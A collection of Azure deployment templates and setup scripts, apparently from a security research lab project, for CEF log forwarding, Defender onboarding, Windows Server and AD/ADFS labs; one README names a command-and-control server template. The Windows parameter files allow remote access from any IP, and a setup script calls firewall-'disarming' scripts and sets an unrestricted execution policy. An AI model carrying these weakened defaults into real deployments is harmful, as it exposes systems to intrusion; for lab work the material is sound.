/templates/azure/CEF-Log-Analytics-Agent/README.md:
--------------------------------------------------------------------------------
1 | # Common Event Format (CEF) Server + Log Analytics Agent for Linux
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCEF-Log-Analytics-Agent%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCEF-Log-Analytics-Agent%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCEF-Log-Analytics-Agent%2Fazuredeploy.json)
6 |
7 |
--------------------------------------------------------------------------------
/templates/azure/CEF-Log-Analytics-Agent/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the VM to run scripts on"
9 | }
10 | },
11 | "extensionName": {
12 | "type": "string"
13 | },
14 | "fileUris": {
15 | "type": "array"
16 | },
17 | "commandToExecute": {
18 | "type": "string"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2019-03-01",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Azure.Extensions",
35 | "type": "CustomScript",
36 | "typeHandlerVersion": "2.1",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {},
39 | "protectedSettings": {
40 | "commandToExecute": "[parameters('commandToExecute')]",
41 | "fileUris": "[parameters('fileUris')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/CEF-Log-Analytics-Agent/scripts/Set-Up-CEF.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | # *********** log tagging variables ***********
7 | INFO_TAG="[INSTALLATION-INFO]"
8 | ERROR_TAG="[INSTALLATION-ERROR]"
9 |
10 | # *********** Set Log File ***************
11 | LOGFILE="/var/log/FW-SETUP.log"
12 | echoerror() {
13 | printf "${RC} * ERROR${EC}: $@\n" 1>&2;
14 | }
15 |
16 | # *********** helk function ***************
17 | usage(){
18 | echo " "
19 | echo "Usage: $0 [option...]" >&2
20 | echo
21 | echo " -w Azure Sentinel Workspace ID"
22 | echo " -k Azure Sentinel Workspace Key"
23 | echo
24 | echo "Examples:"
25 | echo " $0 -w xxxxx -k xxxxxx"
26 | echo " "
27 | exit 1
28 | }
29 |
30 | # ************ Command Options **********************
31 | while getopts w:k:h option
32 | do
33 | case "${option}"
34 | in
35 | w) WORKSPACE_ID=$OPTARG;;
36 | k) WORKSPACE_KEY=$OPTARG;;
37 | h) usage;;
38 | \?) usage;;
39 | : ) echo "Missing option argument for -$OPTARG" >&2; exit 1;;
40 | * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;;
41 | esac
42 | done
43 |
44 | if ((OPTIND == 1))
45 | then
46 | echo "$ERROR_TAG No options specified"
47 | usage
48 | fi
49 |
50 | #######################
51 | # SYSLOG SERVER SETUP #
52 | #######################
53 | python3 cef_installer.py $WORKSPACE_ID $WORKSPACE_KEY
54 | sleep 15
55 |
56 | ###########################
57 | # SEND SAMPLE CEF MESSAGE #
58 | ###########################
59 | #apt-get update -qq
60 | #apt-get install -qqy python3-pip
61 | #python3 -m pip install python-dateutil
62 | python3 cef_simulator.py --debug
--------------------------------------------------------------------------------
/templates/azure/CEF-Log-Analytics-Agent/scripts/cef_replace.yaml:
--------------------------------------------------------------------------------
1 | SRCTESTIP: 1.2.3.4
2 | DSTTESTIP: 10.0.0.1
--------------------------------------------------------------------------------
/templates/azure/Linux-C2/README.md:
--------------------------------------------------------------------------------
1 | # Command and Control Server
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-C2%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-C2%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Linux-Drupal/README.md:
--------------------------------------------------------------------------------
1 | # Drupal Server
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-Drupal%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux-Drupal%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Linux/README.md:
--------------------------------------------------------------------------------
1 | # Linux Virtual Machines (Ubuntu, Red Hat * CentOS)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLinux%2Fazuredeploy.json)
6 |
7 |
--------------------------------------------------------------------------------
/templates/azure/Linux/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to install the Azure Monitor Agent. The format is an array of endpoints with a property/attribute named 'vmName'"
9 | }
10 | },
11 | "fileUris": {
12 | "type": "array"
13 | },
14 | "commandToExecute": {
15 | "type": "string"
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | }
22 | }
23 | },
24 | "resources": [
25 | {
26 | "name": "[concat(parameters('virtualMachines')[copyIndex('customScriptCopy')].vmName,'/',parameters('virtualMachines')[copyIndex('customScriptCopy')].extensionName)]",
27 | "type": "Microsoft.Compute/virtualMachines/extensions",
28 | "apiVersion": "2019-03-01",
29 | "location": "[parameters('location')]",
30 | "copy": {
31 | "name": "customScriptCopy",
32 | "count": "[length(parameters('virtualMachines'))]"
33 | },
34 | "properties": {
35 | "publisher": "Microsoft.Azure.Extensions",
36 | "type": "CustomScript",
37 | "typeHandlerVersion": "2.1",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {},
40 | "protectedSettings": {
41 | "commandToExecute": "[parameters('commandToExecute')]",
42 | "fileUris": "[parameters('fileUris')]"
43 | }
44 | }
45 | }
46 | ]
47 | }
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace-Sentinel/README.md:
--------------------------------------------------------------------------------
1 | # Log Analytics Workspace + Azure Sentinel
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Sentinel%2Fmain.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Sentinel%2Fmain.json)
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace-Solutions/README.md:
--------------------------------------------------------------------------------
1 | # Log Analytics Workspace Solutions
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Solutions%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace-Solutions%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace-Solutions/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "location": {
6 | "type": "string",
7 | "defaultValue": "[resourceGroup().location]",
8 | "metadata": {
9 | "description": "Location for all resources."
10 | }
11 | },
12 | "resourcegroupName": {
13 | "defaultValue": "",
14 | "type": "String"
15 | },
16 | "subscriptionId": {
17 | "defaultValue": "",
18 | "type": "String"
19 | },
20 | "workspaceName": {
21 | "defaultValue": "",
22 | "type": "String"
23 | },
24 | "solutionTypes": {
25 | "defaultValue": [],
26 | "type": "Array"
27 | }
28 | },
29 | "resources": [
30 | {
31 | "type": "Microsoft.OperationsManagement/solutions",
32 | "apiVersion": "2015-11-01-preview",
33 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]",
34 | "location": "[parameters('location')]",
35 | "plan": {
36 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]",
37 | "product": "[Concat('OMSGallery/', parameters('solutionTypes')[copyIndex()])]",
38 | "promotionCode": "",
39 | "publisher": "Microsoft"
40 | },
41 | "properties": {
42 | "workspaceResourceId": "[Concat('/subscriptions/', parameters('subscriptionId'), '/resourceGroups/', parameters('resourcegroupName'), '/providers/Microsoft.OperationalInsights/workspaces/', parameters('workspaceName'))]"
43 | },
44 | "id": "[Concat('/subscriptions/', parameters('subscriptionId'), '/resourceGroups/', parameters('resourcegroupName'), '/providers/Microsoft.OperationsManagement/solutions/', parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]",
45 | "copy": {
46 | "name": "solutionsCopy",
47 | "count": "[length(parameters('solutionTypes'))]"
48 | }
49 | }
50 | ]
51 | }
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace/README.md:
--------------------------------------------------------------------------------
1 | # Log Analytics Workspace
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FLog-Analytics-Workspace%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Log-Analytics-Workspace/main.bicep:
--------------------------------------------------------------------------------
1 | param utcValue string {
2 | metadata: {
3 | description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
4 | }
5 | default: utcNow()
6 | }
7 | param workspaceName string {
8 | metadata: {
9 | description: 'Name for the Log Analytics workspace used to aggregate data'
10 | }
11 | }
12 | param pricingTier string {
13 | allowed: [
14 | 'PerGB2018'
15 | 'Free'
16 | 'Standalone'
17 | 'PerNode'
18 | 'Standard'
19 | 'Premium'
20 | ]
21 | metadata: {
22 | description: 'Pricing tier: pergb2018 or legacy tiers (Free, Standalone, PerNode, Standard or Premium) which are not available to all customers.'
23 | }
24 | default: 'PerGB2018'
25 | }
26 | param dataRetention int {
27 | minValue: 7
28 | maxValue: 730
29 | metadata: {
30 | description: 'Number of days of retention. Workspaces in the legacy Free pricing tier can only have 7 days.'
31 | }
32 | default: 30
33 | }
34 | param immediatePurgeDataOn30Days bool {
35 | metadata: {
36 | description: 'If set to true when changing retention to 30 days, older data will be immediately deleted. Use this with extreme caution. This only applies when retention is being set to 30 days.'
37 | }
38 | default: true
39 | }
40 | param location string {
41 | metadata: {
42 | description: 'Location for all resources.'
43 | }
44 | default: resourceGroup().location
45 | }
46 |
47 | var uniqueWorkspace_var = 'log-${workspaceName}${uniqueString(resourceGroup().id, utcValue)}'
48 |
49 | resource uniqueWorkspace 'Microsoft.OperationalInsights/workspaces@2020-08-01' = {
50 | name: uniqueWorkspace_var
51 | location: location
52 | properties: {
53 | retentionInDays: dataRetention
54 | features: {
55 | immediatePurgeDataOn30Days: immediatePurgeDataOn30Days
56 | }
57 | sku: {
58 | name: pricingTier
59 | }
60 | }
61 | }
62 |
63 | output workspaceName_output string = uniqueWorkspace_var
64 | output workspaceIdOutput string = reference(uniqueWorkspace.id, '2020-08-01').customerId
65 | output workspaceKeyOutput string = listKeys(uniqueWorkspace.id, '2015-11-01-preview').primarySharedKey
--------------------------------------------------------------------------------
/templates/azure/Onboard-Endpoints-MDE/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to onboard to Microsoft Defender for Endpoint. Array must have \"vmName\" and \"extensionName\""
9 | }
10 | },
11 | "_mdePackageBlobSasUrl": {
12 | "type": "securestring",
13 | "metadata": {
14 | "description": "Blog SAS Url for Microsoft Defender for Endpoint onboarding package. Zip File."
15 | }
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | },
22 | "defaultValue": "[resourceGroup().location]"
23 | }
24 | },
25 | "variables": {},
26 | "resources": [
27 | {
28 | "name": "[concat(parameters('virtualMachines')[copyIndex('MDEOnboardCopy')].vmName, '/', parameters('virtualMachines')[copyIndex('MDEOnboardCopy')].extensionName)]",
29 | "type": "Microsoft.Compute/virtualMachines/extensions",
30 | "apiVersion": "2019-12-01",
31 | "location": "[parameters('location')]",
32 | "copy": {
33 | "name": "MDEOnboardCopy",
34 | "count": "[length(parameters('virtualMachines'))]"
35 | },
36 | "properties": {
37 | "publisher": "Microsoft.Compute",
38 | "type": "CustomScriptExtension",
39 | "typeHandlerVersion": "1.10",
40 | "autoUpgradeMinorVersion": true,
41 | "settings": {
42 | "fileUris": ["[parameters('_mdePackageBlobSasUrl')]"],
43 | "commandToExecute": "powershell -ExecutionPolicy Unrestricted -command \"Expand-Archive -path WindowsDefenderATPOnboardingPackage.zip -DestinationPath WindowsDefenderATPOnboardingPackage; echo Y| cmd.exe /c 'WindowsDefenderATPOnboardingPackage\\WindowsDefenderATPLocalOnboardingScript.cmd'\""
44 | },
45 | "protectedSettings": {}
46 | }
47 | }
48 | ],
49 | "outputs": {}
50 | }
--------------------------------------------------------------------------------
/templates/azure/Onboard-Endpoints-MDI/scripts/Install-Sensor.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 | [CmdletBinding()]
4 | Param(
5 | [Parameter(Mandatory=$true)]
6 | [string] $AccessKey
7 | )
8 |
9 | Expand-Archive -path "Azure ATP Sensor Setup.zip" -DestinationPath "Azure ATP Sensor Setup"
10 | Start-Process -FilePath "Azure ATP Sensor Setup\Azure ATP Sensor Setup.exe" -ArgumentList @("/quiet","NetFrameworkCommandLineArguments=/q","AccessKey=$AccessKey") -RedirectStandardOutput "MDIStandardOutput.txt" -RedirectStandardError "MDIStandardError.txt" -NoNewWindow -Wait
--------------------------------------------------------------------------------
/templates/azure/Storage-Account-Private-Container/images/AzureDefenderStorage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/templates/azure/Storage-Account-Private-Container/images/AzureDefenderStorage.png
--------------------------------------------------------------------------------
/templates/azure/Storage-Account-Private-Container/images/DiagnosticLogging.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/templates/azure/Storage-Account-Private-Container/images/DiagnosticLogging.png
--------------------------------------------------------------------------------
/templates/azure/Storage-Account-Queue-Services/README.md:
--------------------------------------------------------------------------------
1 | # Storage Account & Queue Services
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FStorage-Account-Queue-Services%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FStorage-Account-Queue-Services%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/User-Assigned-Managed-Identity/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "name": {
6 | "type": "string",
7 | "minLength": 3,
8 | "maxLength": 128,
9 | "metadata": {
10 | "description": "User Assigned Managed identity name"
11 | }
12 | },
13 | "location": {
14 | "type": "string",
15 | "defaultValue": "[resourceGroup().location]",
16 | "metadata": {
17 | "description": "Location for all resources."
18 | }
19 | }
20 | },
21 | "variables": {},
22 | "resources": [
23 | {
24 | "type": "Microsoft.ManagedIdentity/userAssignedIdentities",
25 | "name": "[parameters('name')]",
26 | "apiVersion": "2018-11-30",
27 | "location": "[parameters('location')]"
28 | }
29 | ],
30 | "outputs": {
31 | "identityName": {
32 | "type": "string",
33 | "value": "[parameters('name')]"
34 | },
35 | "identityId": {
36 | "type": "string",
37 | "value": "[resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', parameters('name'))]"
38 | }
39 | }
40 | }
--------------------------------------------------------------------------------
/templates/azure/Virtual-Network-Peerings/README.md:
--------------------------------------------------------------------------------
1 | # Virtual Network Peerings
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FVirtual-Network-Peerings%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FVirtual-Network-Peerings%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Virtual-Network-Peerings/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "sourceVnet": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the source virtual network"
9 | }
10 | },
11 | "sourceVnetId": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Id of the source virtual network"
15 | }
16 | },
17 | "targetVnet": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Name of the target virtual network"
21 | }
22 | },
23 | "targetVnetId": {
24 | "type": "string",
25 | "metadata": {
26 | "description": "Id of the target virtual network"
27 | }
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('sourceVnet'), '/peering-to-remote-', parameters('targetVnet'))]",
39 | "type": "Microsoft.Network/virtualNetworks/virtualNetworkPeerings",
40 | "apiVersion": "2019-11-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "allowVirtualNetworkAccess": true,
44 | "allowForwardedTraffic": false,
45 | "allowGatewayTransit": false,
46 | "useRemoteGateways": false,
47 | "remoteVirtualNetwork": {
48 | "id": "[parameters('targetVnetId')]"
49 | }
50 | }
51 | },
52 | {
53 | "name": "[concat(parameters('targetVnet'), '/peering-to-remote-', parameters('sourceVnet'))]",
54 | "type": "Microsoft.Network/virtualNetworks/virtualNetworkPeerings",
55 | "apiVersion": "2019-11-01",
56 | "location": "[parameters('location')]",
57 | "properties": {
58 | "allowVirtualNetworkAccess": true,
59 | "allowForwardedTraffic": false,
60 | "allowGatewayTransit": false,
61 | "useRemoteGateways": false,
62 | "remoteVirtualNetwork": {
63 | "id": "[parameters('sourceVnetId')]"
64 | }
65 | }
66 | }
67 | ]
68 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server-Hybrid-Runbook-Worker/README.md:
--------------------------------------------------------------------------------
1 | # Windows Server Hybrid Runbook Worker
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-Hybrid-Runbook-Worker%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-Hybrid-Runbook-Worker%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win-Server-HyperV/README.md:
--------------------------------------------------------------------------------
1 | # Windows Server + Hyper-V
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-HyperV%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-HyperV%2Fazuredeploy.json)
4 |
5 | ## References:
6 |
7 | * https://github.com/Azure/azure-quickstart-templates/tree/master/demos/nested-vms-in-virtual-network
--------------------------------------------------------------------------------
/templates/azure/Win-Server-HyperV/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "adminUsername": {
6 | "value": "GEN-UNIQUE"
7 | },
8 | "adminPassword": {
9 | "value": "GEN-PASSWORD"
10 | },
11 | "vmSize": {
12 | "value": "Standard_B2s"
13 | },
14 | "virtualNetworkName": {
15 | "value": "vnet-win"
16 | },
17 | "virtualNetworkAddressRange": {
18 | "value": "192.168.0.0/16"
19 | },
20 | "subnetRange": {
21 | "value": "192.168.2.0/24"
22 | },
23 | "subnetName": {
24 | "value": "snet-win"
25 | },
26 | "remoteAccessMode": {
27 | "value": "AllowPublicIP"
28 | },
29 | "allowedIPAddresses": {
30 | "value": "*"
31 | },
32 | "_artifactsLocation": {
33 | "value": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
34 | },
35 | "_artifactsLocationSasToken": {
36 | "value": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server-HyperV/nestedtemplates/installHyperV.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installHyperVScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('installHyperVScript')]",
33 | "script": "Install-HyperV.ps1",
34 | "function": "Install-HyperV"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {}
39 | }
40 | }
41 | ]
42 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server/README.md:
--------------------------------------------------------------------------------
1 | # Windows Server
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win-Server/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "adminUsername": {
6 | "value": "GEN-UNIQUE"
7 | },
8 | "adminPassword": {
9 | "value": "GEN-PASSWORD"
10 | },
11 | "vmSize": {
12 | "value": "Standard_B2s"
13 | },
14 | "virtualNetworkName": {
15 | "value": "vnet-win"
16 | },
17 | "virtualNetworkAddressRange": {
18 | "value": "192.168.0.0/16"
19 | },
20 | "subnetRange": {
21 | "value": "192.168.2.0/24"
22 | },
23 | "subnetName": {
24 | "value": "snet-win"
25 | },
26 | "remoteAccessMode": {
27 | "value": "AllowPublicIP"
28 | },
29 | "allowedIPAddresses": {
30 | "value": "*"
31 | },
32 | "_artifactsLocation": {
33 | "value": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
34 | },
35 | "_artifactsLocationSasToken": {
36 | "value": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -Version 5
2 |
3 | Set-ExecutionPolicy Unrestricted -Force
4 |
5 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
6 |
7 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
8 | Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
9 |
10 | Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
11 | Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
12 | Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
13 | Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0
14 |
15 | Install-Module -Name xDnsServer -RequiredVersion 2.0.0
--------------------------------------------------------------------------------
/templates/azure/Win-Server/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Install DSC Modules
5 | & .\Install-DSC-Modules.ps1
6 |
7 | # Custom Settings applied
8 | & .\Prepare-Box.ps1
9 |
10 | # Additional configs
11 | & .\Disarm-Box.ps1
12 |
13 | # Additional Firewall rules
14 | & .\Disarm-Firewall.ps1
15 |
16 | # Enable PSRemoting
17 | & .\Configure-PSRemoting.ps1
18 |
19 | # Windows Security Audit Categories
20 | & .\Enable-WinAuditCategories.ps1 -SetDC
21 |
22 | # PowerShell Logging
23 | & .\Enable-PowerShell-Logging.ps1
24 |
25 | # Set SACLs
26 | & .\Set-SACLs.ps1
27 |
28 | # Set Wallpaper
29 | & .\Set-WallPaper.ps1
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Windows Server (Active Directory) + Windows Server (Active Directory Federation Services)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-ADFS%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-ADFS%2Fazuredeploy.json)
4 |
5 | ## Resources
6 |
7 | * One Windows Active Directory domain (One Domain Controller)
8 | * Active Directory Certificate Services (AD CS) Certification Authority (CA) role service enabled
9 | * Enterprise Root Certificate Authority created
10 | * ADFS Site Certificate created
11 | * ADFS Signing Certificate created
12 | * ADFS Decryption Certificate created
13 | * SMB share C:\Setup created to distribute ADFS certificates (.CER & .PFX files)
14 | * Full Access: Domain Admins & Domain Computers
15 | * Read Access: Authenticated Users
16 | * ADFS service account created
17 | * Azure Active Directory (AAD) Connect installed
18 | * One Windows Active Directory Federation Services (ADFS) server
19 | * Active Directory Federation Services Role Service enabled
20 | * ADFS .pfx certificate retrieved from DC C:\Setup share
21 | * ADFS farm installed
22 | * Idp-Initiated Sign On page enabled
23 | * ADFS WebContent customized (Title, Web Theme, SignIn description)
24 | * ADFS Logging (SuccessAudits & FailureAudits) enabled
25 | * ADFS Auditing
26 | * Level: Verbose
27 | * Auditpol command: auditpol.exe /set /subcategory:"Application Generated" /failure:enable /success:enable
28 | * Azure Active Directory (AAD) Connect installed
29 | * Windows 10 Workstations (Max. 10)
